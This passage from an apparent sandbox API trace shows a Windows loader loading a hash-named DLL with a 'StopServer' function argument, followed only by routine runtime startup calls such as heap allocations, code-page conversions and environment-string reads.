(HeapHandle=0x460000, Flags=0x8, Size=0x3e) returned 0x470c90 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x5c) returned 0x460780 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x62) returned 0x464bd0 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x78) returned 0x46c6c0 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x62) returned 0x465a10 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x28) returned 0x46b440 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x48) returned 0x470b50 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1a) returned 0x46b230 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x3a) returned 0x470060 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x62) returned 0x464940 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x2a) returned 0x46c740 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x2e) returned 0x464c40 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1c) returned 0x46b890 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xd2) returned 0x465ca0 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x7c) returned 0x463fd0 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x3a) returned 0x470c40 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x90) returned 0x463c00 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x24) returned 0x46b740 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x30) returned 0x4649b0 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x36) returned 0x465a80 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x3c) returned 0x470a60 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x52) returned 0x469650 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x3c) returned 0x4700b0 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xd6) returned 0x4655e0 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x2e) returned 0x4620c0 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1e) returned 0x46b7d0 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x2c) returned 0x462100 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x54) returned 0x468ff0 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x52) returned 0x468f90 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x24) returned 0x46b830 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x42) returned 0x470650 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x2c) returned 0x462140 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x44) returned 0x470100 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x24) returned 0x46b9b0 [0102.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475030 | out: hHeap=0x460000) returned 1 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1000) returned 0x474650 [0102.488] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0102.488] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0102.488] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StopServer" [0102.488] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StopServer", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x469740*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0102.488] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0102.491] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0102.492] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0102.492] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0102.492] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0102.492] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0102.493] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0102.493] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0102.493] GetProcessHeap () returned 0x460000 [0102.493] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0102.493] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0102.493] GetLastError () returned 0x0 [0102.493] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0102.493] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0102.493] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x3c8) returned 0x475ae0 [0102.494] SetLastError (dwErrCode=0x0) [0102.494] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1200) returned 0x475eb0 [0102.495] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0102.495] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0102.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0102.495] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0102.495] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StopServer" [0102.495] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StopServer" [0102.495] GetACP () returned 0x4e4 [0102.495] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x228) returned 0x46ac70 [0102.495] IsValidCodePage (CodePage=0x4e4) returned 1 [0102.495] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0102.495] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0102.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0102.496] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0102.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0102.496] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0102.496] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0102.496] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0102.496] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0102.496] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0102.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0102.496] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0102.496] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0102.496] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0102.496] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0102.497] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1000) returned 0x4770c0 [0102.506] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0102.506] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0102.506] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0102.506] AreFileApisANSI () returned 1 [0102.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0102.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0102.506] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xc4) returned 0x464830 [0102.507] GetEnvironmentStringsW () returned 0x4780d0* [0102.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x4e6) returned 0x478ab0 [0102.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x478ab0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0102.507] FreeEnvironmentStringsW (penv=0x4780d0) returned 1 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x118) returned 0x46a200 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1f) returned 0x46b470 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x2e) returned 0x4698b0 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x31) returned 0x464f70 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x3c) returned 0x4706a0 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x31) returned 0x464fb0 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x14) returned 0x464060 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x24) returned 0x46b770 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xd) returned 0x469be0 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1d) returned 0x46b260 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x31) returned 0x464ff0 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x15) returned 0x465030 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x17) returned 0x4625e0 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe) returned 0x463e90 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x69) returned 0x463eb0 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x3e) returned 0x470a10 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1d) returned 0x46b8f0 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x48) returned 0x470150 